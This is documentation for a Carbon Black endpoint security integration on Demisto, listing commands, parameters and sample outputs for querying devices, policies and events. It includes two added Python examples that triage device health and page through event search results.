VMware Carbon Black Endpoint Standard

Overview


Use the VMware Carbon Black Endpoint Standard integration to manage Carbon Black policies, devices and processes on Demisto.

Use cases


  • Get information about events, policies, devices, and processes on Carbon Black.
  • Update events, policies, devices, and processes on Carbon Black.
  • Delete rules from policies.
  • Create new policies.

Configure VMware Carbon Black Endpoint Standard on Demisto


  1. Navigate to Settings > Integrations > Servers & Services.
  2. Search for VMware Carbon Black Endpoint Standard.
  3. Click Add instance to create and configure a new integration.
    • Name: a textual name for the integration instance.
    • Server URL (example: https://192.168.0.1)
    • API Key
    • API Version
    • Connector ID
    • Fetch incidents
    • Incident type
    • SIEM key: Use to fetch incidents.
    • SIEM Connector ID: Use to fetch incidents.
    • Do not validate server certificate (not secure)
    • Use system proxy settings
  4. Click Test to validate the URLs, token, and connection.

Commands


  1. Get the status of multiple devices: cbd-get-devices-status
  2. Get the status of a specified device: cbd-get-device-status
  3. Change the security policy assigned to a device: cbd-change-device-status
  4. Get multiple events: cbd-find-events
  5. Get a specified event: cbd-find-event
  6. Get multiple processes: cbd-find-processes
  7. Get alert details: cbd-get-alert-details
  8. Get all policy details: cbd-get-policies
  9. Get the details of a specified policy: cbd-get-policy
  10. Create a policy: cbd-create-policy
  11. Update a policy: cbd-update-policy
  12. Delete a policy: cbd-delete-policy
  13. Add a rule to a policy: cbd-add-rule-to-policy
  14. Delete a rule from a policy: cbd-delete-rule-from-policy
  15. Update a rule in a policy: cbd-update-rule-in-policy
  16. Set a policy: cbd-set-policy

Get the status of multiple devices


Retrieves the status of multiple devices, as specified by further input.

Base Command

cbd-get-devices-status

Input
Parameter | Description | More Information
hostName | Host name of the device to search for | Case insensitive
hostNameExact | Exact host name of the device to search for | Case sensitive
ownerName | Device owner name | Case insensitive
ownerNameExact | Exact device owner name | Case sensitive
ipAddress | External or internal IP address of the device to search for | -
start | Shows results from this row onward | -
rows | Maximum number of result rows | This parameter can be limited on the Cb Defense server side

Context Output
Path Description
CarbonBlackDefense.GetDevicesStatus.Results.ActivationCodeExpiryTime Activation code expiry time
CarbonBlackDefense.GetDevicesStatus.Results.LastExternalIpAddress Last external IP address
CarbonBlackDefense.GetDevicesStatus.Results.LastLocation Last location
CarbonBlackDefense.GetDevicesStatus.Results.LastReportedTime Last reported time
CarbonBlackDefense.GetDevicesStatus.Results.LastShutdownTime Last shutdown time
CarbonBlackDefense.GetDevicesStatus.Results.OsVersion Operating system version
CarbonBlackDefense.GetDevicesStatus.Results.PolicyId Policy ID
CarbonBlackDefense.GetDevicesStatus.Results.RegisteredTime Registered time
CarbonBlackDefense.GetDevicesStatus.Results.Status Status
CarbonBlackDefense.GetDevicesStatus.Results.DeviceId Device ID
CarbonBlackDefense.GetDevicesStatus.Results.DeviceOwnerId Device owner ID
CarbonBlackDefense.GetDevicesStatus.Results.DeviceType Device type
CarbonBlackDefense.GetDevicesStatus.Results.OrganizationId Organization ID
CarbonBlackDefense.GetDevicesStatus.Results.SensorVersion Sensor version
CarbonBlackDefense.GetDevicesStatus.Results.TargetPriorityType Target priority type
CarbonBlackDefense.GetDevicesStatus.Results.Email Email address
CarbonBlackDefense.GetDevicesStatus.Results.LastContact Last contact
CarbonBlackDefense.GetDevicesStatus.Results.OrganizationName Organization name
CarbonBlackDefense.GetDevicesStatus.Results.SensorStates Sensor states
CarbonBlackDefense.GetDevicesStatus.Results.AvStatus AV status
CarbonBlackDefense.GetDevicesStatus.Results.LastInternalIpAddress Last internal IP address
CarbonBlackDefense.GetDevicesStatus.Results.Name Name
CarbonBlackDefense.GetDevicesStatus.Results.PolicyName Policy name
CarbonBlackDefense.GetDevicesStatus.Results.SensorOutOfDate Sensor out-of-date
CarbonBlackDefense.GetDevicesStatus.Results.TestId Test ID

Command Example

!cbd-get-devices-status rows="1"

Context Example
{
    "CarbonBlackDefense": {
        "GetDevicesStatus": {
            "Results": {
                "ActivationCodeExpiryTime": 1524157210454,
                "AvStatus": null,
                "LastContact": 1533646970617,
                "LastLocation": "OFFSITE",
                "Name": "cberninger-mac2",
                "LastExternalIpAddress": "67.143.208.113",
                "TestId": -1,
                "PolicyId": 6525,
                "OrganizationId": 1105,
                "RegisteredTime": 1523552410489,
                "TargetPriorityType": "MEDIUM",
                "DeviceType": "MAC",
                "DeviceId": 844355,
                "Status": "REGISTERED",
                "OsVersion": "MAC OS X 10.10.5",
                "LastReportedTime": 1533642023089,
                "DeviceOwnerId": 278380,
                "LastShutdownTime": 1533587921518,
                "SensorOutOfDate": false,
                "LastInternalIpAddress": "192.168.2.125",
                "SensorStates": [
                    "ACTIVE",
                    "LIVE_RESPONSE_NOT_RUNNING",
                    "LIVE_RESPONSE_NOT_KILLED",
                    "LIVE_RESPONSE_DISABLED",
                    "SECURITY_CENTER_OPTLN_DISABLED"
                ],
                "Email": "cberninger",
                "PolicyName": "default",
                "OrganizationName": "cb-internal-alliances.com",
                "SensorVersion": "3.0.2.8"
            }
        }
    }
}
Human Readable Output
ActivationCodeExpiryTime 1524157210454
AvStatus
DeviceId 844355
DeviceOwnerId 278380
DeviceType MAC
Email cberninger
LastContact 1533646970617
LastExternalIpAddress 67.143.208.113
LastInternalIpAddress 192.168.2.125
LastLocation OFFSITE
LastReportedTime 1533642023089
LastShutdownTime 1533587921518
Name cberninger-mac2
OrganizationId 1105
OrganizationName cb-internal-alliances.com
OsVersion MAC OS X 10.10.5
PolicyId 6525
PolicyName default
RegisteredTime 1523552410489
SensorOutOfDate false
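
In a playbook the device status above is usually consumed, not just displayed: the fields that matter for fleet hygiene are Status, SensorOutOfDate, SensorStates and the epoch-millisecond LastContact. The following is an added example, not the integration's own code; it assumes the CarbonBlackDefense.GetDevicesStatus.Results layout documented above, uses the page's sample device plus a second, constructed one, and fixes "now" so the result is deterministic.

```python
"""Triage of cbd-get-devices-status output (added example, not the integration's code).

Assumes the CarbonBlackDefense.GetDevicesStatus.Results layout documented above
and epoch-millisecond timestamps as shown in the Context Example.
"""
from datetime import datetime, timedelta, timezone

# Assumption: a sensor that has not checked in for a week deserves attention.
STALE_AFTER = timedelta(days=7)

# "Now" is fixed so the example is deterministic (2018-08-07 ~13:53 UTC,
# shortly after the page's sample device last reported in).
NOW_MS = 1533650000000

# Sample context: the first device is the one from the Context Example above
# (trimmed to the fields used here); the second is constructed to show a
# device with an out-of-date, inactive sensor that has gone quiet.
SAMPLE_CONTEXT = {
    "GetDevicesStatus": {
        "Results": [
            {
                "Name": "cberninger-mac2",
                "DeviceId": 844355,
                "PolicyName": "default",
                "Status": "REGISTERED",
                "LastLocation": "OFFSITE",
                "LastContact": 1533646970617,
                "SensorOutOfDate": False,
                "SensorVersion": "3.0.2.8",
                "SensorStates": ["ACTIVE", "LIVE_RESPONSE_NOT_RUNNING",
                                 "LIVE_RESPONSE_NOT_KILLED", "LIVE_RESPONSE_DISABLED",
                                 "SECURITY_CENTER_OPTLN_DISABLED"],
            },
            {
                "Name": "example-host-02",        # constructed
                "DeviceId": 900002,               # constructed
                "PolicyName": "default",
                "Status": "REGISTERED",
                "LastLocation": "ONSITE",         # constructed
                "LastContact": 1532000000000,     # constructed: ~19 days before NOW_MS
                "SensorOutOfDate": True,
                "SensorVersion": "2.1.0.0",       # constructed
                "SensorStates": ["LIVE_RESPONSE_DISABLED"],
            },
        ]
    }
}


def ms_to_iso(ms):
    """Render a Cb Defense epoch-millisecond timestamp as ISO 8601 UTC."""
    base = datetime.fromtimestamp(ms // 1000, tz=timezone.utc)
    return base.strftime("%Y-%m-%dT%H:%M:%S") + ".%03dZ" % (ms % 1000)


def device_issues(device, now_ms, stale_after=STALE_AFTER):
    """Return the findings for one Results entry (empty list means healthy)."""
    issues = []
    if device.get("Status") != "REGISTERED":
        issues.append("status is %s" % device.get("Status"))
    if device.get("SensorOutOfDate"):
        issues.append("sensor %s is out of date" % device.get("SensorVersion"))
    if "ACTIVE" not in (device.get("SensorStates") or []):
        issues.append("sensor is not ACTIVE")
    last = device.get("LastContact")
    if last is None:
        issues.append("device has never contacted the server")
    else:
        age = timedelta(milliseconds=now_ms - last)
        if age > stale_after:
            issues.append("last contact %s (%d days ago)" % (ms_to_iso(last), age.days))
    return issues


def triage_devices(context, now_ms=NOW_MS, stale_after=STALE_AFTER):
    """Report every device under GetDevicesStatus.Results that has findings.

    Results is a single object when one row matches (as in the rows="1"
    Context Example above) and a list otherwise; both shapes are accepted.
    """
    results = context.get("GetDevicesStatus", {}).get("Results", [])
    if isinstance(results, dict):
        results = [results]
    report = []
    for dev in results:
        issues = device_issues(dev, now_ms, stale_after)
        if issues:
            report.append({"Name": dev.get("Name"), "DeviceId": dev.get("DeviceId"),
                           "PolicyName": dev.get("PolicyName"), "Issues": issues})
    return report


if __name__ == "__main__":
    for entry in triage_devices(SAMPLE_CONTEXT):
        print("%s (%s): %s" % (entry["Name"], entry["DeviceId"], "; ".join(entry["Issues"])))
```

Devices that come back with findings are the natural input for cbd-change-device-status (for example, moving them to a stricter policy) or for a ticket to the endpoint team.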

Get the status of a specified device


Retrieves the status of a specified device.

Base Command

cbd-get-device-status

Input
Parameter | Description
deviceId | Individual device ID

Context Output
Path Description
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType Target priority type
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId Organization ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime Time of creation
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId Device ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email Email address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress Last internal IP address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation Last location
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion Operating system version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus AV status
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress Last external IP address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime Time of registration
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact Last contact
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status Status
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId Test ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId Policy ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion Update version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName Organization name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics Rooted by analytics
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion Sensor version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType Device type
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName Policy name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime Rooted by analytics time
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate Sensor out-of-date
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates Sensor states
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name Name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime Last reported time
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId Device owner ID

Command Example

!cbd-get-device-status deviceId="844355"

Context Example
{
    "CarbonBlackDefense": {
        "GetDeviceStatus": {
            "DeviceInfo": {
                "ActivationCodeExpiryTime": null,
                "AvStatus": null,
                "LastContact": 1533648166041,
                "LastLocation": "OFFSITE",
                "Name": "cberninger-mac2",
                "LastExternalIpAddress": "67.143.208.113",
                "TestId": -1,
                "PolicyId": 6525,
                "OrganizationId": 1105,
                "RegisteredTime": 1523552410489,
                "TargetPriorityType": "MEDIUM",
                "DeviceType": "MAC",
                "DeviceId": 844355,
                "Status": "REGISTERED",
                "OsVersion": "MAC OS X 10.10.5",
                "LastReportedTime": 1533642023089,
                "DeviceOwnerId": 278380,
                "LastShutdownTime": 1533587921518,
                "SensorOutOfDate": false,
                "LastInternalIpAddress": "192.168.2.125",
                "SensorStates": [
                    "ACTIVE",
                    "LIVE_RESPONSE_NOT_RUNNING",
                    "LIVE_RESPONSE_NOT_KILLED",
                    "LIVE_RESPONSE_DISABLED",
                    "SECURITY_CENTER_OPTLN_DISABLED"
                ],
                "Email": "cberninger",
                "PolicyName": "default",
                "OrganizationName": "cb-internal-alliances.com",
                "SensorVersion": "3.0.2.8"
            }
        }
    }
}
Human Readable Output
ActivationCodeExpiryTime
AvStatus
DeviceId 844355
DeviceOwnerId 278380
DeviceType MAC
Email cberninger
LastContact 1533648166041
LastExternalIpAddress 67.143.208.113
LastInternalIpAddress 192.168.2.125
LastLocation OFFSITE
LastReportedTime 1533642023089
LastShutdownTime 1533587921518
Name cberninger-mac2
OrganizationId 1105
OrganizationName cb-internal-alliances.com
OsVersion MAC OS X 10.10.5
PolicyId 6525
PolicyName default
RegisteredTime 1523552410489
SensorOutOfDate false

Change the security policy assigned to a device


Changes the security policy assigned to a specified device.

Base Command

cbd-change-device-status

Input
Parameter | Description
deviceId | The device ID
policyId | The policy ID
policyName | The policy name

Context Output
Path Description
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType Target priority type
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId Organization ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime Time of creation
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId Device ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email Email address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress Last internal IP address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation Last location
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion Operating system version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus Anti-virus status
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress Last external IP address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime Registration time
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact Last contact
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status Status
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId Test ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId Policy ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion Update version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName Organization name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics Rooted by analytics
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion Sensor version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType Device type
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName Policy name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime Rooted by analytics time
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate Sensor out-of-date
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates Sensor states
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name Name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime Time of last report
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId Device owner ID

Command Example

!cbd-change-device-status deviceId="844355" policyName="default"

Context Example
{
    "CarbonBlackDefense": {
        "ChangeDeviceStatus": {
            "DeviceInfo": {
                "AvStatus": null,
                "LastContact": 1533648445513,
                "LastLocation": "OFFSITE",
                "Name": "cberninger-mac2",
                "LastExternalIpAddress": "67.143.208.113",
                "TestId": -1,
                "PolicyId": 6525,
                "OrganizationId": 1105,
                "RegisteredTime": 1523552410489,
                "TargetPriorityType": "MEDIUM",
                "DeviceType": "MAC",
                "DeviceId": 844355,
                "Status": "REGISTERED",
                "OsVersion": "MAC OS X 10.10.5",
                "LastReportedTime": 1533642023089,
                "DeviceOwnerId": 278380,
                "LastShutdownTime": 1533587921518,
                "SensorOutOfDate": false,
                "LastInternalIpAddress": "192.168.2.125",
                "SensorStates": [
                    "ACTIVE",
                    "LIVE_RESPONSE_NOT_RUNNING",
                    "LIVE_RESPONSE_NOT_KILLED",
                    "LIVE_RESPONSE_DISABLED",
                    "SECURITY_CENTER_OPTLN_DISABLED"
                ],
                "Email": "cberninger",
                "PolicyName": "default",
                "OrganizationName": "cb-internal-alliances.com",
                "SensorVersion": "3.0.2.8"
            }
        }
    }
}
Human Readable Output
AvStatus
DeviceId 844355
DeviceOwnerId 278380
DeviceType MAC
Email cberninger
LastContact 1533648445513
LastExternalIpAddress 67.143.208.113
LastInternalIpAddress 192.168.2.125
LastLocation OFFSITE
LastReportedTime 1533642023089
LastShutdownTime 1533587921518
Name cberninger-mac2
OrganizationId 1105
OrganizationName cb-internal-alliances.com
OsVersion MAC OS X 10.10.5
PolicyId 6525
PolicyName default
RegisteredTime 1523552410489
SensorOutOfDate false
SensorStates ACTIVE,LIVE_RESPONSE_NOT_RUNNING,LIVE_RESPONSE_NOT_KILLED,LIVE_RESPONSE_DISABLED,SECURITY_CENTER_OPTLN_DISABLED

Get multiple events


Returns multiple event details, as specified by further input.

Base Command

cbd-find-events

Input
Parameter | Description | More Information
hostName | Host name of the event to search for | Case insensitive
hostNameExact | Exact host name of the event to search for | Case sensitive
ownerName | Owner name of the event to search for | Case insensitive
ownerNameExact | Exact owner name of the event to search for | Case sensitive
ipAddress | External or internal IP address | -
sha256hash | Searches for events generated by a process with this SHA-256 hash | Must be lowercase
applicationName | Searches for events generated by a process with this application name | Must be lowercase
eventType | Searches for events associated with this event type | -
searchWindow | Events generated within this time frame | Default is one day. Events might not be available after 30 days due to retention policies.
start | Shows results from this row onward | -
rows | Maximum number of result rows | This parameter can be limited on the Cb Defense server side

Context Output
Path Description
CarbonBlackDefense.FindEvents.Results.EventType Event type
CarbonBlackDefense.FindEvents.Results.ProcessDetails.MilisSinceProcessStart Milliseconds since the beginning of the process
CarbonBlackDefense.FindEvents.Results.ProcessDetails.Name Name
CarbonBlackDefense.FindEvents.Results.ProcessDetails.PrivatePid Private PID
CarbonBlackDefense.FindEvents.Results.ProcessDetails.ProcessId Process ID
CarbonBlackDefense.FindEvents.Results.ShortDescription Short description
CarbonBlackDefense.FindEvents.Results.CreateTime Time of creation
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceName Device name
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceVersion Device version
CarbonBlackDefense.FindEvents.Results.DeviceDetails.PolicyName Policy name
CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityType Target priority type
CarbonBlackDefense.FindEvents.Results.DeviceDetails.AgentLocation Agent location
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceId Device ID
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpV4Address IpV4 address of the device
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.AreaCode Area code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryCode Country code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Latitude Latitude
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Longitude Longitude
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.City City
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryName Country name
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.DmaCode DMA code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.MetroCode Metro code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.PostalCode Postal code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Region Region
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpAddress Device IP address
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceType Device type
CarbonBlackDefense.FindEvents.Results.DeviceDetails.Email Email address
CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityCode Target priority code
CarbonBlackDefense.FindEvents.Results.EventId Event ID
CarbonBlackDefense.FindEvents.Results.EventTime Event time
CarbonBlackDefense.FindEvents.Results.LongDescription Long description
CarbonBlackDefense.FindEvents.Results.NetFlow.DestAddress Dest address
CarbonBlackDefense.FindEvents.Results.NetFlow.DestPort Dest port
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerFqdn Peer Fqdn
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpAddress Peer IP address
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpV4Address Peer IpV4 address
CarbonBlackDefense.FindEvents.Results.NetFlow.Service Service
CarbonBlackDefense.FindEvents.Results.NetFlow.SourceAddress Source address
CarbonBlackDefense.FindEvents.Results.NetFlow.SourcePort Source port
CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationName Application name
CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationPath Application path
CarbonBlackDefense.FindEvents.Results.SelectedApp.Md5Hash MD5 hash
CarbonBlackDefense.FindEvents.Results.SelectedApp.Sha256Hash SHA-256 hash
CarbonBlackDefense.FindEvents.Results.ThreatIndicators Threat indicators

Command Example

!cbd-find-events rows=1

Context Example
{
    "CarbonBlackDefense": {
        "FindEvents": {
            "Results": {
                "ShortDescription": "The application \"cloud-drive-ui\" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22).",
                "LongDescription": "The application \"/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui\" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful.",
                "SelectedApp": {
                    "ApplicationName": "cloud-drive-ui",
                    "ApplicationPath": "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui",
                    "EffectiveReputation": "LOCAL_WHITE",
                    "EffectiveReputationSource": "PRE_EXISTING",
                    "Md5Hash": "b43632f807770d141008deb988a65ad9",
                    "ReputationProperty": "NOT_LISTED",
                    "Sha256Hash": "f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b"
                },
                "EventTime": 1533649991975,
                "CreateTime": 1533650036964,
                "DeviceDetails": {
                    "DeviceName": "cberninger-mac2",
                    "DeviceVersion": "MAC OS X 10.10.5",
                    "TargetPriorityCode": 1,
                    "DeviceLocation": {
                        "City": null,
                        "CountryCode": "US",
                        "CountryName": "United States",
                        "Latitude": 37.751007,
                        "Longitude": -97.822,
                        "Region": null
                    },
                    "TargetPriorityType": "MEDIUM",
                    "DeviceType": "MAC",
                    "DeviceId": 844355,
                    "DeviceIpAddress": "67.143.208.113",
                    "DeviceIpV4Address": "67.143.208.113",
                    "AgentLocation": "OFFSITE",
                    "Email": "cberninger",
                    "PolicyName": "default"
                },
                "TargetApp": {
                    "ApplicationName": null,
                    "EffectiveReputation": null,
                    "EffectiveReputationSource": null,
                    "ReputationProperty": null,
                    "Sha256Hash": null
                },
                "ProcessDetails": {
                    "FullUserName": "cberninger",
                    "PrivatePid": "1071-1533502548722-245",
                    "ProcessId": 1071,
                    "Name": "cloud-drive-ui",
                    "TargetCommandLine": null,
                    "MilisSinceProcessStart": 147443253,
                    "UserName": "cberninger",
                    "TargetPrivatePid": null,
                    "TargetPid": null,
                    "TargetName": null,
                    "CommandLine": null
                },
                "EventType": "NETWORK",
                "EventId": "4ad25ae99a4911e88515b3c49ffeda59"
            },
            "TotalResults": {
                "TotalResults": 10666
            }
        }
    },
    "Endpoint": {
        "Domain": null,
        "Hostname": "cberninger-mac2",
        "IPAddress": "67.143.208.113",
        "OS": "MAC"
    },
    "Process": {
        "Path": null,
        "SHA1": null,
        "ParentID": null,
        "PID": 1071,
        "Name": "cloud-drive-ui",
        "Endpoint": null,
        "ParentName": null,
        "MD5": null,
        "CommandLine": null
    }
}
Human Readable Output
CreateTime 1533650036964
DeviceDetails AgentLocation OFFSITE
DeviceDetails DeviceId 844355
DeviceDetails DeviceIpAddress 67.143.208.113
DeviceDetails DeviceIpV4Address 67.143.208.113
DeviceDetails DeviceLocation City
DeviceDetails DeviceLocation CountryCode US
DeviceDetails DeviceLocation CountryName United States
DeviceDetails DeviceLocation Latitude 37.751007
DeviceDetails DeviceLocation Longitude -97.822
DeviceDetails DeviceLocation Region
DeviceDetails DeviceName cberninger-mac2
DeviceDetails DeviceType MAC
DeviceDetails DeviceVersion MAC OS X 10.10.5
DeviceDetails Email cberninger
DeviceDetails PolicyName default
DeviceDetails TargetPriorityCode 1
DeviceDetails TargetPriorityType MEDIUM
EventId 4ad25ae99a4911e88515b3c49ffeda59
EventTime 1533649991975
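
Two details of cbd-find-events matter once it is driven from automation rather than typed by hand: sha256hash and applicationName must be lowercase, and the server may return fewer rows than requested, so paging has to advance by what actually came back. The following is an added example, not the integration's own code; the command is abstracted as run_command(name, args) returning the FindEvents context, and the row cap and event list of the fake server are constructed here (the first event is the one from the Context Example above).

```python
"""Argument hygiene and paging for cbd-find-events (added example).

Assumes run_command(name, args) returns the FindEvents context documented
above: Results (object for one match, list otherwise) plus TotalResults.
"""
import re

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")


def build_find_events_args(sha256hash=None, application_name=None,
                           host_name=None, search_window=None, rows=100, start=0):
    """Assemble cbd-find-events arguments, enforcing the documented rule that
    sha256hash and applicationName are lowercase; rejects malformed hashes."""
    args = {"rows": str(rows), "start": str(start)}
    if sha256hash is not None:
        sha = sha256hash.strip().lower()
        if not SHA256_RE.match(sha):
            raise ValueError("sha256hash must be 64 hexadecimal characters")
        args["sha256hash"] = sha
    if application_name is not None:
        args["applicationName"] = application_name.lower()
    if host_name is not None:
        args["hostName"] = host_name   # case-insensitive match, nothing to normalise
    if search_window is not None:
        args["searchWindow"] = search_window
    return args


def iter_all_events(run_command, base_args, max_events=None):
    """Yield events page by page using start/rows.

    The next start is advanced by the number of rows actually returned, not by
    the rows requested, because the server may cap rows on its side.
    """
    start = int(base_args.get("start", 0))
    yielded = 0
    while True:
        resp = run_command("cbd-find-events", dict(base_args, start=str(start)))
        results = resp.get("Results") or []
        if isinstance(results, dict):   # a single match is flattened to an object
            results = [results]
        if not results:
            return
        for event in results:
            yield event
            yielded += 1
            if max_events is not None and yielded >= max_events:
                return
        start += len(results)
        total = int(resp.get("TotalResults", {}).get("TotalResults", 0))
        if start >= total:
            return


# Constructed fake server data: the first event is the one from the Context
# Example; the remaining six are placeholders.
FAKE_EVENTS = [{"EventId": "4ad25ae99a4911e88515b3c49ffeda59", "EventType": "NETWORK"}] + [
    {"EventId": "constructed-event-%02d" % i, "EventType": "NETWORK"} for i in range(2, 8)
]


def make_fake_server(events, row_cap):
    """Return (run_command, calls): a stand-in for the real command that honours
    start, silently caps rows at row_cap, and logs every call's arguments."""
    calls = []

    def run_command(command, args):
        calls.append(dict(args))
        start = int(args.get("start", 0))
        rows = min(int(args.get("rows", row_cap)), row_cap)
        page = events[start:start + rows]
        return {"Results": page[0] if len(page) == 1 else page,
                "TotalResults": {"TotalResults": len(events)}}

    return run_command, calls


if __name__ == "__main__":
    run, calls = make_fake_server(FAKE_EVENTS, row_cap=3)
    query = build_find_events_args(
        sha256hash="f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b".upper(),
        rows=10)
    found = list(iter_all_events(run, query))
    print("%d events in %d calls" % (len(found), len(calls)))
```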

Get a specified event


Returns the details of a specified event.

Base Command

cbd-find-event

Input
Parameter | Description
eventId | Event ID

Context Output
Path Description
CarbonBlackDefense.GetAlertDetails.EventInfo.ShortDescription Short description
CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.ApplicationName Application name
CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.ReputationProperty Reputation property
CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.Sha256Hash SHA-256 hash
CarbonBlackDefense.GetAlertDetails.EventInfo.EventType Event type
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.Md5Hash MD5 hash
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.Sha256Hash SHA-256 hash
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ApplicationPath Application path
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ReputationProperty Reputation property
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ApplicationName Application name
CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationId Organization ID
CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationName Organization name
CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationType Organization type
CarbonBlackDefense.GetAlertDetails.EventInfo.ParentHash.ApplicationName Application name
CarbonBlackDefense.GetAlertDetails.EventInfo.ParentHash.Sha256Hash SHA-256 hash
CarbonBlackDefense.GetAlertDetails.EventInfo.EventId Event ID
CarbonBlackDefense.GetAlertDetails.EventInfo.LongDescription Long description
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceIpV4Address Device IpV4 address
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceType Device type
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.Email Email address
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.TargetPriorityCode Target priority code
